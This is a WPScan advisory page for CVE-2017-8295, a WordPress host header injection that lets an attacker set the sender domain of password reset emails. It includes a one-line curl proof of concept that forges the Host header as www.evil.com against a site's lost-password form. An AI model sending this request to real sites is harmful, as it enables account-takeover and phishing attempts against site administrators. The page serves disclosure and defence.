WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Vulnerabilities

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

Description

Attacker may be able to set the 'From' email header in password reset emails.

Proof of Concept

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Affects WordPress

3.8.1
No known fix
3.8
No known fix
3.7.1
No known fix
3.6
No known fix
3.5.2
No known fix
3.5.1
No known fix
3.5
No known fix
3.4.2
No known fix
3.4.1
No known fix
3.4
No known fix

References

CVE
CVE-2017-8295
URL
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
URL
https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
URL
https://core.trac.wordpress.org/ticket/25239

Classification

Type

UNKNOWN

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter
dewhurstsec
Verified

No

WPVDB ID
b3f2f3db-75e4-4d48-ae5e-d4ff172bc093

Timeline

Publicly Published

2017-05-03 (about 5 years ago)

Added

2017-05-05 (about 5 years ago)

Last Updated

2020-09-22 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin